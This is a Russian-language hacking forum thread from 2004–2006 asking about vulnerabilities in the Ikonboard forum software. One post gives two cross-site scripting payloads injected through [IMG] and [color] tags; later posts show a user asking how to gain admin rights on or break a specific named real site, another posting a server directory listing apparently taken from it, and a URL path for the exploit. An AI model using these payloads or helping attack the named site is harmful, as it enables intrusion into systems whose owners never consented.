Какие Уязвимости есть в Iconboard?

Discussion in 'Песочница' started by Fr1k, 19 Aug 2004.

  1. Fr1k

    Fr1k Elder - Старейшина

    Joined:
    11 Jun 2004
    Messages:
    252
    Likes Received:
    4
    Reputations:
    0
    Какие Уязвимости есть в Iconboard???
    Знаю про баг который позволяет пользователям обратится к ограниченным ресурсам но эта дыра заклеена... существую ли ещё какие нить баги?
     
  2. Guest

    Guest Guest

    Reputations:
    0
    Парень тебе здесь никто не скажет т.к этот форум на таком движке стоит
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Есть xss в теге ...
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>[b]Исходный код[/b] </td></tr><tr><td id="CODE">
    [IMG]javascript:alert('antichat.ru')
    [/QUOTE]<span id='postcolor'>
    И  в теге [color]
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    [color=red;background-image:url('javascript:alert('LOL')')]antichat[/color]
    [/QUOTE]<span id='postcolor'>
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ne zaplatalai diru chto li? &nbsp;[​IMG]
     
  5. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    В нашем форуме это пофиксено
     
  6. RAMOS

    RAMOS Banned

    Joined:
    5 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -5
    че можна зделать с board.zeos.net Можно получить права админа или просто сламать
     
  7. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Знаю я его ;)
    Там действует одна из уязвимостей,которая описана в обзоре данного движка .
    http://forum.antichat.ru/thread26024.html

    P/s:Задрало говорить юзай поиск !
     
    #7 _-[A.M.D]HiM@S-_, 14 Nov 2006
    Last edited: 14 Nov 2006
  8. RAMOS

    RAMOS Banned

    Joined:
    5 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -5
    ета уязвимость там не работает , там нет никаких ID , там есть чтото наподобие MID=90-1162285788 и ссылка там не site/cgi-bin/forum/ikonboard.cgi? , а site/cgi-bin/ikonboard.cgi? ЕСТЬ на него какието еще уязвимости
     
    #8 RAMOS, 14 Nov 2006
    Last edited: 14 Nov 2006
  9. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    З.ы:У меня почимуто там все роботает ;)


    Code:
    <option value='banner.zeos.net'>banner.zeos</option>
    <option value='board.zeos.net'>board.zeos</option>
    <option value='cgi-bin'></option>
    <option value='club.pixelfab.com'>club.pixelfab</option>
    <option value='htdocs'></option>
    <option value='icons'></option>
    <option value='new.zeos.net'>new.zeos</option>
    <option value='old.zeos.net'>old.zeos</option>
    <option value='test.zeos.net'>test.zeos</option>
    <option value='us.zeos.net'>us.zeos</option>
    <option value='www.incubus.net'>www.incubus</option>
    <option value='www.pixelfab.com'>www.pixelfab</option>
    <option value='www.polar.kiev.ua'>www.polar.kiev</option>
    <option value='www.zeos.net'>www.zeos</option>
     
    #9 _-[A.M.D]HiM@S-_, 14 Nov 2006
    Last edited: 14 Nov 2006
  10. RAMOS

    RAMOS Banned

    Joined:
    5 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -5
    как мне ето использовать , что писать после /cgi-bin/ikonboard.cgi?act=UserCP;CODE=01;MODE=1 , и что мне даст ета уязвимость
     
    #10 RAMOS, 14 Nov 2006
    Last edited: 14 Nov 2006
  11. RAMOS

    RAMOS Banned

    Joined:
    5 Nov 2006
    Messages:
    11
    Likes Received:
    0
    Reputations:
    -5
    ПОМОГИТЕ МНЕ ЕГО СЛАМАТЬ
     
Loading...